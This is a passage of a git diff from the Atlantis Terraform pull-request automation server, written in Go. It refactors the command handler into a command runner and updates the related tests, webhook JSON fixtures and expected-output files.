asynchronously. // We use a goroutine so that this function returns and the connection is // closed. - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + go e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command) } else { // When testing we want to wait for everything to complete. - e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command) } } @@ -289,7 +275,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // request if the event is a merge request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) { - pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event) + pull, baseRepo, headRepo, user, err := e.Parser.ParseGitlabMergeEvent(event) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return @@ -306,7 +292,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, eventType = OtherPullEvent } e.Logger.Info("identified event as type %q", eventType) - e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType) } // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise. diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 7d9f300a72..5abb66ad37 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -164,7 +164,7 @@ func TestGitHubWorkflow(t *testing.T) { When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) // First, send the open pull request event and trigger an autoplan. - pullOpenedReq := GitHubPullRequestOpenedEvent(t) + pullOpenedReq := GitHubPullRequestOpenedEvent(t, headSHA) ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") if c.ExpAutoplanCommentFile != "" { @@ -236,51 +236,51 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, } defaultTFVersion := terraformClient.Version() - commandHandler := &events.CommandHandler{ + locker := events.NewDefaultAtlantisWorkspaceLocker() + commandRunner := &events.DefaultCommandRunner{ + ProjectCommandRunner: &events.ProjectCommandRunner{ + Locker: projectLocker, + LockURLGenerator: &mockLockURLGenerator{}, + InitStepRunner: runtime.InitStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + PlanStepRunner: runtime.PlanStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + ApplyStepRunner: runtime.ApplyStepRunner{ + TerraformExecutor: terraformClient, + }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: runtime.PullApprovedChecker{ + VCSClient: e2eVCSClient, + }, + Workspace: atlantisWorkspace, + Webhooks: &mockWebhookSender{}, + AtlantisWorkspaceLocker: locker, + }, EventParser: eventParser, VCSClient: e2eVCSClient, GithubPullGetter: e2eGithubGetter, GitlabMergeRequestGetter: e2eGitlabGetter, CommitStatusUpdater: e2eStatusUpdater, - AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), MarkdownRenderer: &events.MarkdownRenderer{}, Logger: logger, AllowForkPRs: allowForkPRs, AllowForkPRsFlag: "allow-fork-prs", - PullRequestOperator: &events.DefaultPullRequestOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: e2eVCSClient, - Workspace: atlantisWorkspace, - ProjectOperator: events.ProjectOperator{ - Locker: projectLocker, - LockURLGenerator: &mockLockURLGenerator{}, - InitStepOperator: runtime.InitStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - }, - PlanStepOperator: runtime.PlanStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - }, - ApplyStepOperator: runtime.ApplyStepOperator{ - TerraformExecutor: terraformClient, - }, - RunStepOperator: runtime.RunStepOperator{}, - ApprovalOperator: runtime.ApprovalOperator{ - VCSClient: e2eVCSClient, - }, - Workspace: atlantisWorkspace, - Webhooks: &mockWebhookSender{}, - }, + ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: e2eVCSClient, + Workspace: atlantisWorkspace, + AtlantisWorkspaceLocker: locker, }, } ctrl := server.EventsController{ TestingMode: true, - CommandRunner: commandHandler, + CommandRunner: commandRunner, PullCleaner: &events.PullClosedExecutor{ Locker: lockingClient, VCSClient: e2eVCSClient, @@ -298,12 +298,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, }, SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, VCSClient: e2eVCSClient, - AtlantisGithubUser: models.User{ - Username: "atlantisbot", - }, - AtlantisGitlabUser: models.User{ - Username: "atlantisbot", - }, } return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace } @@ -331,10 +325,12 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request { return req } -func GitHubPullRequestOpenedEvent(t *testing.T) *http.Request { +func GitHubPullRequestOpenedEvent(t *testing.T, headSHA string) *http.Request { requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json")) Ok(t, err) - req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + // Replace sha with expected sha. + requestJSONStr := strings.Replace(string(requestJSON), "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", headSHA, -1) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer([]byte(requestJSONStr))) Ok(t, err) req.Header.Set("Content-Type", "application/json") req.Header.Set(githubHeader, "pull_request") @@ -357,7 +353,7 @@ func GitHubPullRequestParsed(headSHA string) *github.PullRequest { headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d" } return &github.PullRequest{ - Number: github.Int(1), + Number: github.Int(2), State: github.String("open"), HTMLURL: github.String("htmlurl"), Head: &github.PullRequestBranch{ diff --git a/server/events_controller_test.go b/server/events_controller_test.go index a7f5c81a69..225021086f 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -16,6 +16,7 @@ package server_test import ( "bytes" "errors" + "fmt" "io/ioutil" "net/http" "net/http/httptest" @@ -267,9 +268,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) { e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") - // wait for 200ms so goroutine is called - time.Sleep(200 * time.Millisecond) - cr.VerifyWasCalledOnce().ExecuteCommand(models.Repo{}, models.Repo{}, models.User{}, 0, nil) + cr.VerifyWasCalledOnce().RunCommentCommand(models.Repo{}, &models.Repo{}, models.User{}, 0, nil) } func TestPost_GithubCommentSuccess(t *testing.T) { @@ -281,16 +280,14 @@ func TestPost_GithubCommentSuccess(t *testing.T) { When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) baseRepo := models.Repo{} user := models.User{} - cmd := events.Command{} + cmd := events.CommentCommand{} When(p.ParseGithubIssueCommentEvent(matchers.AnyPtrToGithubIssueCommentEvent())).ThenReturn(baseRepo, user, 1, nil) When(cp.Parse("", models.Github)).ThenReturn(events.CommentParseResult{Command: &cmd}) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") - // wait for 200ms so goroutine is called - time.Sleep(200 * time.Millisecond) - cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd) + cr.VerifyWasCalledOnce().RunCommentCommand(baseRepo, nil, user, 1, &cmd) } func TestPost_GithubPullRequestInvalid(t *testing.T) { @@ -301,45 +298,87 @@ func TestPost_GithubPullRequestInvalid(t *testing.T) { event := `{"action": "closed"}` When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, errors.New("err")) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err") } -func TestPost_GithubPullRequestInvalidRepo(t *testing.T) { - t.Log("when the event is a github pull request with invalid repo data we return a 400") - e, v, _, p, _, _, _, _ := setup(t) +func TestPost_GitlabMergeRequestInvalid(t *testing.T) { + t.Log("when the event is a gitlab merge request with invalid data we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(githubHeader, "pull_request") - - event := `{"action": "closed"}` - When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, errors.New("err")) + req.Header.Set(gitlabHeader, "value") + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) - responseContains(t, w, http.StatusBadRequest, "Error parsing repo data: err") + responseContains(t, w, http.StatusBadRequest, "Error parsing webhook: err") } func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) { t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400") - e, v, _, p, _, _, _, _ := setup(t) + e, v, _, _, _, _, _, _ := setup(t) e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(githubHeader, "pull_request") event := `{"action": "closed"}` When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") } -func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a pull request and we have an error calling CleanUpPull we return a 503") +func TestPost_GitlabMergeRequestNotWhitelisted(t *testing.T) { + t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(gitlabHeader, "value") + + e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") +} + +func TestPost_GithubPullRequestUnsupportedAction(t *testing.T) { + e, v, _, _, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(githubHeader, "pull_request") + + event := `{"action": "unsupported"}` + When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event") +} + +func TestPost_GitlabMergeRequestUnsupportedAction(t *testing.T) { + t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = "unsupported" + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event") +} + +func TestPost_GithubPullRequestClosedErrCleaningPull(t *testing.T) { + t.Log("when the event is a closed pull request and we have an error calling CleanUpPull we return a 503") RegisterMockTestingT(t) e, v, _, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) @@ -349,30 +388,30 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) repo := models.Repo{} pull := models.PullRequest{State: models.Closed} - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pull)).ThenReturn(errors.New("cleanup err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: cleanup err") } -func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500") +func TestPost_GitlabMergeRequestClosedErrCleaningPull(t *testing.T) { + t.Log("when the event is a closed gitlab merge request and an error occurs calling CleanUpPull we return a 500") e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = "close" When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: err") } -func TestPost_GithubPullRequestSuccess(t *testing.T) { +func TestPost_GithubClosedPullRequestSuccess(t *testing.T) { t.Log("when the event is a pull request and everything works we return a 200") e, v, _, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) @@ -382,8 +421,7 @@ func TestPost_GithubPullRequestSuccess(t *testing.T) { When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) repo := models.Repo{} pull := models.PullRequest{State: models.Closed} - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pull)).ThenReturn(nil) w := httptest.NewRecorder() e.Post(w, req) @@ -398,12 +436,68 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") } +func TestPost_PullOpenedOrUpdated(t *testing.T) { + cases := []struct { + Description string + HostType models.VCSHostType + Action string + }{ + { + "github opened", + models.Github, + "opened", + }, + { + "gitlab opened", + models.Gitlab, + "open", + }, + { + "github synchronized", + models.Github, + "synchronize", + }, + { + "gitlab update", + models.Gitlab, + "update", + }, + } + + for _, c := range cases { + t.Run(c.Description, func(t *testing.T) { + e, v, gl, p, cr, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + switch c.HostType { + case models.Gitlab: + req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = c.Action + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + case models.Github: + req.Header.Set(githubHeader, "pull_request") + event := fmt.Sprintf(`{"action": "%s"}`, c.Action) + When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) + repo := models.Repo{} + pull := models.PullRequest{State: models.Closed} + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) + } + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Processing...") + cr.VerifyWasCalledOnce().RunAutoplanCommand(models.Repo{}, models.Repo{}, models.PullRequest{State: models.Closed}, models.User{}) + }) + } +} + func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { RegisterMockTestingT(t) v := mocks.NewMockGithubRequestValidator() @@ -414,6 +508,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid c := emocks.NewMockPullCleaner() vcsmock := vcsmocks.NewMockClientProxy() e := server.EventsController{ + TestingMode: true, Logger: logging.NewNoopLogger(), GithubRequestValidator: v, Parser: p, diff --git a/server/router_test.go b/server/router_test.go new file mode 100644 index 0000000000..91bf9f3fc9 --- /dev/null +++ b/server/router_test.go @@ -0,0 +1,27 @@ +package server_test + +import ( + "net/http" + "testing" + + "github.com/gorilla/mux" + "github.com/runatlantis/atlantis/server" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRouter_GenerateLockURL(t *testing.T) { + queryParam := "queryparam" + routeName := "routename" + atlantisURL := "https://example.com" + + underlyingRouter := mux.NewRouter() + underlyingRouter.HandleFunc("/lock", func(_ http.ResponseWriter, _ *http.Request) {}).Methods("GET").Queries(queryParam, "{queryparam}").Name(routeName) + + router := &server.Router{ + AtlantisURL: atlantisURL, + LockViewRouteIDQueryParam: queryParam, + LockViewRouteName: routeName, + Underlying: underlyingRouter, + } + Equals(t, "https://example.com/lock?queryparam=myid", router.GenerateLockURL("myid")) +} diff --git a/server/server.go b/server/server.go index fe97620d53..1980ba2521 100644 --- a/server/server.go +++ b/server/server.go @@ -63,7 +63,7 @@ type Server struct { AtlantisVersion string Router *mux.Router Port int - CommandHandler *events.CommandHandler + CommandRunner *events.DefaultCommandRunner Logger *logging.SimpleLogger Locker locking.Locker AtlantisURL string @@ -221,45 +221,43 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GitlabToken: userConfig.GitlabToken, } defaultTfVersion := terraformClient.Version() - commandHandler := &events.CommandHandler{ - EventParser: eventParser, + commandRunner := &events.DefaultCommandRunner{ VCSClient: vcsClient, GithubPullGetter: githubClient, GitlabMergeRequestGetter: gitlabClient, CommitStatusUpdater: commitStatusUpdater, - AtlantisWorkspaceLocker: workspaceLocker, + EventParser: eventParser, MarkdownRenderer: markdownRenderer, Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, - PullRequestOperator: &events.DefaultPullRequestOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: vcsClient, - Workspace: workspace, - ProjectOperator: events.ProjectOperator{ - Locker: projectLocker, - LockURLGenerator: router, - InitStepOperator: runtime.InitStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - }, - PlanStepOperator: runtime.PlanStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - }, - ApplyStepOperator: runtime.ApplyStepOperator{ - TerraformExecutor: terraformClient, - }, - RunStepOperator: runtime.RunStepOperator{}, - ApprovalOperator: runtime.ApprovalOperator{ - VCSClient: vcsClient, - }, - Workspace: workspace, - Webhooks: webhooksManager, + ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + }, + ProjectCommandRunner: &events.ProjectCommandRunner{ + Locker: projectLocker, + LockURLGenerator: router, + InitStepRunner: runtime.InitStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + PlanStepRunner: runtime.PlanStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + ApplyStepRunner: runtime.ApplyStepRunner{ + TerraformExecutor: terraformClient, + }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: runtime.PullApprovedChecker{ + VCSClient: vcsClient, }, + Workspace: workspace, + Webhooks: webhooksManager, + AtlantisWorkspaceLocker: workspaceLocker, }, } repoWhitelist := &events.RepoWhitelistChecker{ @@ -273,7 +271,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockDetailTemplate: lockTemplate, } eventsController := &EventsController{ - CommandRunner: commandHandler, + CommandRunner: commandRunner, PullCleaner: pullClosedExecutor, Parser: eventParser, CommentParser: commentParser, @@ -285,14 +283,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { RepoWhitelistChecker: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, - AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, - AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, Router: underlyingRouter, Port: userConfig.Port, - CommandHandler: commandHandler, + CommandRunner: commandRunner, Logger: logger, Locker: lockingClient, AtlantisURL: userConfig.AtlantisURL, @@ -313,7 +309,8 @@ func (s *Server) Start() error { s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo})) s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST") s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}") - s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName) + s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET"). + Queries(LockViewRouteIDQueryParam, fmt.Sprintf("{%s}", LockViewRouteIDQueryParam)).Name(LockViewRouteName) n := negroni.New(&negroni.Recovery{ Logger: log.New(os.Stdout, "", log.LstdFlags), PrintStack: false, diff --git a/server/server_test.go b/server/server_test.go index 54776cfe9e..cec7a4fcb9 100644 --- a/server/server_test.go +++ b/server/server_test.go @@ -103,6 +103,7 @@ func TestIndex_Success(t *testing.T) { } func responseContains(t *testing.T, r *httptest.ResponseRecorder, status int, bodySubstr string) { + t.Helper() Equals(t, status, r.Result().StatusCode) body, _ := ioutil.ReadAll(r.Result().Body) Assert(t, strings.Contains(string(body), bodySubstr), "exp %q to be contained in %q", bodySubstr, string(body)) diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json index 1fd568761e..cc281a8d7a 100644 --- a/server/testfixtures/githubPullRequestClosedEvent.json +++ b/server/testfixtures/githubPullRequestClosedEvent.json @@ -1,15 +1,15 @@ { "action": "closed", - "number": 1, + "number": 2, "pull_request": { - "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2", "id": 193308707, "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", - "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", - "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", - "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch", - "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", - "number": 1, + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2", + "number": 2, "state": "closed", "locked": false, "title": "Add new project layouts", @@ -53,10 +53,10 @@ ], "milestone": null, - "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits", - "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments", "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", - "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e", "head": { "label": "runatlantis:atlantisyaml", @@ -308,25 +308,25 @@ }, "_links": { "self": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2" }, "html": { - "href": "https://github.com/runatlantis/atlantis-tests/pull/1" + "href": "https://github.com/runatlantis/atlantis-tests/pull/2" }, "issue": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2" }, "comments": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments" }, "review_comments": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments" }, "review_comment": { "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" }, "commits": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits" }, "statuses": { "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e" diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json index 0b969438ec..03ee106b5e 100644 --- a/server/testfixtures/githubPullRequestOpenedEvent.json +++ b/server/testfixtures/githubPullRequestOpenedEvent.json @@ -12,7 +12,7 @@ "number": 2, "state": "open", "locked": false, - "title": "Noyaml", + "title": "branch", "user": { "login": "runatlantis", "id": 1034429, @@ -59,8 +59,8 @@ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d", "head": { - "label": "runatlantis:noyaml", - "ref": "noyaml", + "label": "runatlantis:branch", + "ref": "branch", "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", "user": { "login": "runatlantis", diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act deleted file mode 100644 index aa4f734726..0000000000 --- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act +++ /dev/null @@ -1,7 +0,0 @@ -Ran Apply in dir: `.` workspace: `default` -**Apply Error** -``` -no plan found at path "." and workspace "default"–did you run plan? -``` - - diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act deleted file mode 100644 index 0da9bc5a5e..0000000000 --- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act +++ /dev/null @@ -1,61 +0,0 @@ -Ran Plan for 2 projects: -1. workspace: `default` path: `.` -1. workspace: `default` path: `.` - -### 1. workspace: `default` path: `.` -**Plan Error** -``` -exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": - -Initializing the backend... - -Successfully configured the backend "local"! Terraform will automatically -use this backend unless the backend configuration changes. - -Initializing provider plugins... -- Checking for available provider plugins on https://releases.hashicorp.com... - -Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout. - -Terraform analyses the configuration and state and automatically downloads -plugins for the providers used. However, when attempting to download this -plugin an unexpected error occured. - -This may be caused if for some reason Terraform is unable to reach the -plugin repository. The repository may be 